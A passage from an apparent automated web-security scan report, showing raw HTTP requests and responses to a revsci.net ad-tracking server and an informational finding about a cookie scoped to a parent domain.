VzGSgvQvwgs+exbHFnc9EjIddHJPxoCf8xPMcHMY7i4fJkltPnbGNum2RGErBaL3IQD4byLTDLqt6linCL0aYGwJdSBkfix2rLj7yV5wfRFPB2hvrpTly69I4tNPZSuo7Re3ltmxmNoGMMc5V688ZShrCorTyXT5HHbnIGvVwdcWoBjdNSPoU3RVPewhWha3saMNv786Z3Ta0x4g+lQ9hO7XPaXsOIOELem/hpZQhYtrIVk+4Qu45yeAK+LAboAgr7mIU/nV1cnxzml0hpdot9dlxNym8EVmSmNGd2zGE/7gzkhMBDHTOMOwlXeUwRtaCOjAkiBXj6SefITGD5RtElQFFpSF16hQ9D36l8bsqPjVWBL+LBtegzD4ysrc4Op6V1Nz6lcuAKwjA93Q3+zT6U3LgJsxQJTtMM0Mgz/CplqKgMwIahHHkXmEjwjJchSXFtUcKq6SdTw0KuLxKqjrbDWwUXxU+5gL8yD9J08r8DuDudCvFwuHSFlVtb0YNduZTvmVY3XRPasFJqi3HtxwBtfaOSQzQg9ibEPA5zXqtjsdSD/L5pfZiIdxsTIQNxRXCoYAkStlRWMxY8CvqNgb04VFV5TZ2A8TjHBxV1JrRTc4eD4uP7qawUp231hI="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklaD7QC8F/ow1QxM58Yyl6WnV++4nDUcwbFT7BTwJlQNkxSfqk5EhERJiohDhufcOy3Id0CYSTjUGW9FgOwRDxL6wisceGScbfetKK4DxmEo0Jf/6ghwMwCdr0RM7KzxbQPxF5AxyiUvBIfftgLaEkyxXt16/t7NUl3aE5qIiQx8DeOS9EWfAPZ+srDdH6HKD4no8LmSqb4r8JoNavI6/Pq+FS2+SPndI6oUGSTSGOB6mSiq0G79yS8n9fumcLKftCiMQcLYzowEtlpEFRKgp7YQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mn+ogNLpohJejQnvSINaxSmfNFonBB4XAvdwG2Z2uDopXsO6cJD425xztfMc0Uqt6y0rFPJTQFsyGqe8EBAlFrUUd+/lb8j4Nmb1JMmsSvCmpf96IUsi2WHeHHNZJbtczxxe9YtzqmlXJgOVW2N0OOtjRHHcGRgW+RjXOgjkj+rWPitJ2tY9ei5VJtAVZNZiMtI66kkHcCkZcxcpXp0k0G5RsaG6ZuhGp1TcsCM8qnoAnK5/R22SWsNEs0BL2Bd9Nt2McKDG9BwX7uCDFLLBLVHsZjqOr6P+jcXdCXO+D6a+vTw11DUUhKee7Q26yPn1NuJYL80yHNk+LHB7OF8c6Lc0zNGU5YPapEOBTAgsFogd6R1rYuQrEacwMq9L0yNhOe9O/w7j0XlrfqyiL/TUp4sRwiIdeFXJwsNPfqnNdeBCEZM978ug78IesbrO7bSJS3eczYZyrxw58MpPvittMs9uZEceX722dcC8dDh3zf3gGHl2Hk7gBfLSbnAGT8VWC+iP/tvOT6qvay++mLGOoka8n2mli89tb7EQEPwtKFJx5mygLYgzTSkKgp8k+lr2WuWM4okUWVxgKfRSwRsdb7U0OWicRvr4P7oJ3wKSVkXQtlaKrkpU7RPne8QBrG+vOUs/1fYyjJ+G/CtrBRFzYvfrmJjjQcZzs0Uz8WZxuhjS47hSaXZfWhziYSHbJjT8cUj9idijflNmwZrvYkwdgwyVP/eZooABCjNhuHJbyzBY1ypfCcMKSvR9ZLpXKXcOeRyC0H6+3m4khUWgow1q5aZaY+7iTTs/rSvAyjLcPSUExYGLqXK8n/B/kL5taXj26cytUvUUKOlTVqBCwi6whU2wmQQDkh5GN1CzZJMNhSesIn12qK/QnKp0zAWtlHb7ucjuJ/liucx5wZUJSEB3PjJe33yTpCu8QxOr2Kjl6OlONN7EyK4gVhuhY9LcuxtFk+HS1I00XGL8RhkDlwMU9RRlGJdWB20xyfeThGmdQtQpWq0tyZA/WIKZQoTb0kkSgCog0gjCrND3C7ZNvfBJw8e3KLdV+gLE54oXJZkOwdwu6oY4i9G3dR+qMM7KKTtNtyA3E0omvuepmPaAullSzXpGOjHT0chHLBZDeNR/VYxVNsu0ppApCvr5VHfOQKovoVZagXyk9kuWNCpDBnkwyVIF9sptVlKExtZrgWwu2zX716ONgCpL3+WEnAYsWo1W7+XBx73LwwZeymku5JzPMOVhY4A4B6yN2DFGjriJdYjFXXmLQAHQz5X0jUii7Mn83OJaYp3D6gt8bZKJyLd6/rBHsR3LuoQDN0OBmg7H3jhhyCn1sMKsX+nBabbnwAO4hpyhhLM/Tv9nyp8WSnWh6d1Xu73HwAwpWhHzcLzG9Cmpg3354R9pN9/ZMQFA=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKQJYv+UbBCVRVSZrobvtLMxEgZPYynL0er8BWtYtV0dJ53KZo9p/px9SgRp/FzXiFoxdNtps8MXjN8V1WG8p/Ol7HkTm5q7eShAm36bmKM7dx1A/Vxwef83PAeTH8qIcBf02eAyO1/7xFtrS0DhXUOdRHhAzlA0KYq34T5UVu59BjzK6KOWnK/nEb/SXdvXkuNNM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZHSvnrXbZhwnrg+Sti3jYa16vkgNMv8HjFHDQP/2HO42kRP80ce/k4WsU6sAiJISH2/r3PUaypbi/tEnX3NAxVJBIsGOZSzR3RzxPTgs1nQn1LBhYdUF376uHnA56pGp24XOD3JcIhDw8d59s8JqjhNmXwRXJJ48CbQDFR9cy7Ms7Wr21xeDzQz7bkPEsPq+xz5XLKjbPvWVHlEckSUWh3YwCmrlAv9RCj58g0lTP4pLvuCeK1RV+seBswg0K/TXQ8nu6PZVdN909hJu5E3Ssxo/ZDBnZ603pUglwBZNtps8MXjN8V1oGcp/Ol7HkTm5qzeShAm/6S2rtXzaEYwm3wefc3NAePEy2cUAH4mu25Cz/7xFtrTLDRXshiG7zkOhTXyWFMDmAv6yqFMJWypL5kg0W9n0hIkdKUZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:43:03 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:43:03 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.160. http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/474207582.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N9VsKld5Cvqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/011PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS7Sbx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9a3RoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:37:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/474207582.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_2iyk="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihLZ9WP6iKbjeS1EvCK92NakAmHiwdDZ+32U8DOmgVO/YIwtdemT1DUjfH8oh8yRi/RAd80bpK/lFDTj9A5kkDRuEN30YAuOhJs2CmOnGedOFqdCL19QBNwzfI7AzypDlSzvHNt3VJEpE4vyQOB0Ikv8p3l4+ptfiCTJyNAZKFfD/JqeAExwy8NmcGDlAuGlqEc27v4ClQ+NhjI/ELPOBQGnizVBjWuxpNdThs0cHqYBPdO30OuHUE+ZDEAHXRbLP7chyJp18Ka/PsQ5Kd9feRznUKxo94Cnv5DI6ngSA8s1GpBOJlaYPZ5kI90DNFJ1vf70bkVGEmLjFapsKKzfwoW42Z7YDQQbwyKUS4nq7wniOwdyyJwKeXuaM2bpDyKzYbzgHBKVaiLCOUAG40FLmOkFe7SIsbUecWLBGARgUsCApYrYxImjwLgnqZncXz5b5IGa0dW/+bDU5M/THVsi221xi/ZETsskwnWa8xspgda3YvKrBP9n9YaQ84slrTPonu+yJl457zXZxVA7Rm2GjsuJTj5GsnM438a3lS22g8SsUynV4vpP29uBbyXRuOGeb1dOSLGDty11xAcZBUh+aqpnBQWyFJJWFzjAa8WkcLIaUgH6iAzJkFLM+HJw5QoPFOuCLXUiYhXhm/xp0WL+r9uhm77/uYv8jdEnAVyXVzGSgvQvwgs+exQeAg1MLywVcHJPxoCf8xPMcHMY7i4d1kncIpa2LUm2RGErBaL3IQD67wkA+G8DxlynCL0aYGwJdSBkfix2rLj7yV5wfRFPB2hvrpTly69I4tNPZSuo7Re3ltmxmNoGMMc5V688ZShrCorTyXT5HHbnIGvVwdcWoBjdNSPoU3RVPewhWha3saMNv786Z3Ta0x4g+lQ9hO7XPaXsOIOELem/hpZQhYtrIVk+4Qu45yeAK+LAboAgr7mIU/nV1cnxzml0hpdot9dlxNym8EVmSmNGd2zGE/7gzkhMBDHTOMOwlXeUwRtaCOjAkiBXj6SefITGD5RtElQFFpSF16hQ9D36l8bsqPjVWBL+LBtegzD4ysrc4Op6VlNz6lcuAKwjA93Q3+zT6U3LgJsxQJTtMM0Mgz/CplqKgMwIahHHkXmEjwjJchSXFtUcKq6SdTw0KuLxKqjrbDWwUXxU+5gL8yD9J08r8DuDudCvFwuHSFlVtb0YNduZTvmVY3XRPasFJqi3HtxwBtfaOSQzQg9ibEPA5zXqtjsdSD/L5pfZiIdxsTIQNxRXCoYAkStlRWMxY8CvqNgb04VFV5TZ2A8TjHBxV1JrRTc4eD4uP7qawUlwt1iE="; rsi_us_1000000="pUMN4ymjOBYY7dWCY6/TotBr0OXJiczDnb+24q2tnlDsIh49roaniYH6308lqj9rm76xsaby1E/Kx9hkOw8Dpfgj0Lqpi3QjUkNsyCt7dKiPSIuUbx737weL8D8Lst4ZfJUhERJnitbhoZSOCXJxlSO17TU7zb9ngiQ4o3n/nFK99X/VmdV4IWSdXBOcCuxjISdkLEZ033N7GzxdQPxF5PBmRO1OlQ150eYxBpLzSBYpqFEqmeFdWn6+pVsc3vMQOzRaWywuPKn6SnLGL9yz+r15IZBV/ckFD/2PfaIA0+OylDHrrScn9vd51iqfuw99lCDChbcFXz+WxPbqCqNu/bgygy4tmNkZO25SZLZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNURgFdfGFIZdTCD9s9skCKNZSymfNFpnBB4XQPVwE2ZleD3BWPvRkOqqH9AvHB6Nx46vpq0Q3QJYQtAjruzKL/zpQWJvz5hyx4xLVSaUnSWpdEywJtSNUOltupRPXnZowwB7WWwv7tBSZHlXRkOhW2O0OutjWH3sCxgW6fhXPgjkj+rWPitJ6tA9ei5Xn69bsCjbXTbMMSJtLN0v5gBVlBeR2DD9NOA2G7vPjsqQE0fB/otaogzQgzUuJT3yFecoAfGp55+Fz2fW9hYX7+AMFKPBLVHsZjqep6POicHeCXO+D6a+vTAl1DUQhKe2wRu4yPH1POpd9dxWbb9GvReb2ZK5FlkWjvNYtja5rkzONI5mBwISoGhDdNQ2EOMx202lG7P8hum2/tg3W3PhZXZpbLCUDphbywIj/Bw8y6pMNc8BRAzl+0he/c1XF+0PQbflEiYFUB+NgtQXg5w83Yv/JuSdyMaFTuKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8dqURZOCjqiH855mK3sqrup8s9L575P6tOzqW+MLC6kSWwQijvnx6yi1Qtz6JfgsHUxL/rL3votvgwb/LGRti+7H3kVCl9G6uLaFSLY+1s9TVi6UljYns+9am2lN7uBE+sUw5LIUwGZ8u2WzpZX4Ld8Yigo7e9/abK31FsoQmLXMaz1P74S+sDcEiJ4oWmF9VqG3rbSWLTeWUJstVfHriUsR7xX0lmqbeQfLJtqAtuaSY6U5bXQbUVakkshAUqVR6fpUT/wAWqbnHqAjXeMDk3cSz3Gu1g31B95wNyNNGOYM8N7+cBARo9I+C5N3vH/gibQt/4Nkvnum1dFfIyAedFXcbKMf5DmAtxyGvgZB6sagfsFzKOAu1Y6IT6b9RHefSw7MCCRWeylgL0HIxVt1Vkwm/cVOoyEmqDW++nndgxpEHgSiNlHaKTXgWlybiJHL6hPQstxzyfu34MYgOHDK1t1BqzVusVn7+lQjivX7+d+T9GntRRepWqwtyZF1qfBP2q7R5qmgX1kvlAOL04xn/sXNvvSFjU/NRP1Ijjn/63xGBcgazZHHZsrWMcQvum6MbypzvmQWXXsMgCXcM9qdcWCmCMThAMk2HDH70ehHLRZM+OR/VcxVNsnUppApCvr5VHfOQKovoVZagXyk9kuWNCVDBnkwydIH+Rea9Y75ZeajbyGu/3t7WQ0ImImCE11Qr58z8AESCDDDdxHk9Ozih01WWqPnOPupwPQCJgv+smBSS5wrR+TXc+ZUSW551zA92lXAliD290d4E9pe7qOv2RwA4nDsDFsuNW1bi9Gg0JyHmPq2usUa9K2Qk6YyzAv1sxMW1uDnKqaNFLpLLTR1McwlF53Fwe3JAg4Jdpne2HE6HhGSooMFH6mJf3ItJA9dXW"; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7/PfE/3lutQJZXy2qdkzqayQ5uhb0V0W1LQ+5EdE6wJ2SwOpge0VstFeErw6zYDPzQho0zEoHnYTaw9t+NXLzTUuTJecCGqrtkiRgjDDoGMnunCHscm3O8dcNnz1HocLzMNeApsnc+bPQELVw7zHIxqAwb0w5kLYRZFv5z25yO3tlbXMIhYgOcVdvbYVOyk=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N9VsKld5Cvqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/01